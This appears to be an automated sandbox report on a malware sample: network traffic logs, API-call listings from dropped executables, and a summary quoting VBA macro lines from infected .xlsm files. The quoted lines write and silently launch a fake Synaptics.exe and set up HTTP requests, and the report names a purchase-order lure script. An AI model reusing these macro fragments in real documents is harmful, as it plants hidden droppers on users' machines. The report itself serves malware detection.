                            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                            Source: unknownHTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49714 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49725 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49724 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49729 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49744 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49743 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49745 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49752 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49751 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49757 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49758 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49761 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49763 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49767 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49770 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49774 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49773 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49775 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49782 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49783 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49808 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49806 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49819 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49820 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49821 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49822 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49825 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49826 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49827 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49828 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49830 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49831 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49846 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49849 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49848 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49867 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49869 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49878 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49877 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49885 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49886 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49892 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49899 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49900 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49905 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49906 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49911 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49914 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00507099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_00507099
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00507294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00507294
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C97294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00C97294
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B17294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,32_2_00B17294
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00507099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_00507099
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,4_2_004F4342
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0051F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_0051F5D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00CAF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00CAF5D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B2F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,32_2_00B2F5D0

                            System Summary

                            barindex
                            Document contains an embedded VBA macro with suspicious strings
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: 1QGQHkIB.xlsm.7.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: NEBFQQYWPS.xlsm.7.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: YDcMLELS.xlsm.26.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: QNCYCDFIJJ.xlsm.26.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Document contains an embedded VBA with functions possibly related to ADO stream file operations
                            Source: 1QGQHkIB.xlsm.7.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: NEBFQQYWPS.xlsm.7.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: YDcMLELS.xlsm.26.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: QNCYCDFIJJ.xlsm.26.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Document contains an embedded VBA with functions possibly related to HTTP operations
                            Source: 1QGQHkIB.xlsm.7.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: NEBFQQYWPS.xlsm.7.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: YDcMLELS.xlsm.26.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: QNCYCDFIJJ.xlsm.26.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                            Source: 1QGQHkIB.xlsm.7.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: NEBFQQYWPS.xlsm.7.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: YDcMLELS.xlsm.26.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: QNCYCDFIJJ.xlsm.26.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Sample has a suspicious name (potential lure to open the executable)
                            Source: Open Purchase Order Summary Sheet.vbsStatic file information: Suspicious name
                            Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F702F: CreateFileW,DeviceIoControl,CloseHandle,4_2_004F702F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_004EB9F1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,4_2_004F82D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00C882D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B082D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,32_2_00B082D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005130AD4_2_005130AD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004C36804_2_004C3680
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004BDCD04_2_004BDCD0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004BA0C04_2_004BA0C0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D01834_2_004D0183
